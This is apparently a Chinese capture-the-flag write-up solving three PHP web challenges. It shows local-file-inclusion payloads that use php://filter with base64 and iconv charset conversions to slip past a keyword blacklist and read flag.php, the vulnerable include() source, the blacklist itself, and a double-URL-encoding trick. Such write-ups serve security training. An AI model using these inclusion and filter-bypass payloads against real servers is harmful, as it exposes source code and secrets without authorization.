网硕互联帮助中心fileinclude
可以看到正常回显里面显示lan参数有cookie值表示为language 然后进行一个判断,如果参数不是等于英语,就加上.php,那我们就可以在前面进行注入一个参数,即flag, payload:COOKIE:language=flag 
发现还是无回显到flag.php里 可能存在的文件读取限制或过滤机制 利用 php://filter 和 language Cookie 组合,通过指定convert.base64 – encode,可以将读取到的文件内容进行 Base64 编码 Payload:Cookie: language=php://filter/convert.base64-encode/resource=flag
缘由:因为服务器可能只检查直接的文件路径访问,而没有考虑到经过编码转换的情况。
得到回显值为PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezhmYzdhY2U0MzE0OTg3Mjk0ZWZiMTFmMDM4ZDM0MTM3fSI7DQo/Pg== 解码可得 
file_include
<?php highlight_file(__FILE__); include("./check.php"); if(isset($_GET['filename'])){ $filename = $_GET['filename']; include($filename); } ?>
当使用 convert.iconv.UTF – 8.UCS – 2 过滤器时,文件内容的编码被改变,原本在 UTF – 8 编码下能被识别的危险字符或模式,在 UCS – 2 编码下可能就无法被识别,从而绕过了服务器的过滤机制。 Payload:?filename=php://filter/convert.iconv.UTF-8.UCS-2/resource=flag.php
check.php的内容为:
<?php if($_GET["filename"]){ $preg_match_username = 'return preg_match("/base|be|encode|print|zlib|quoted|write|rot13|read|string/i", $_GET["filename"]);'; if (eval($preg_match_username)) { die("do not hack!"); } } ## 题目名称-文件包含 通过一开始的测试,我们可以发现显示我们有正常的过滤器,但是参数不对,那我们就开始进行模糊测试,对常见字符进行编码转换,发现还是不对,再对编码格式进行测试,先去搜索php支持的编码格式字典 放到爆破里去进行爆破,解出    Payload:?filename=php://filter/convert.iconv.BIG-5*.UCS-4*/resource=flag.php 解出该flag  ## PHP2 参考网上大佬的资料发现,这里要用到index.phps来查看php的源代码(没用的只是又增加了)  代码审计发现他要求id=admin的编码,所以我们进行编码后发现还是显示错误,后面发现经过一次编码,浏览器会自动进行一次解码环节,所以我们要进行二次编码才可以,得出flag 
评论前必须登录!
注册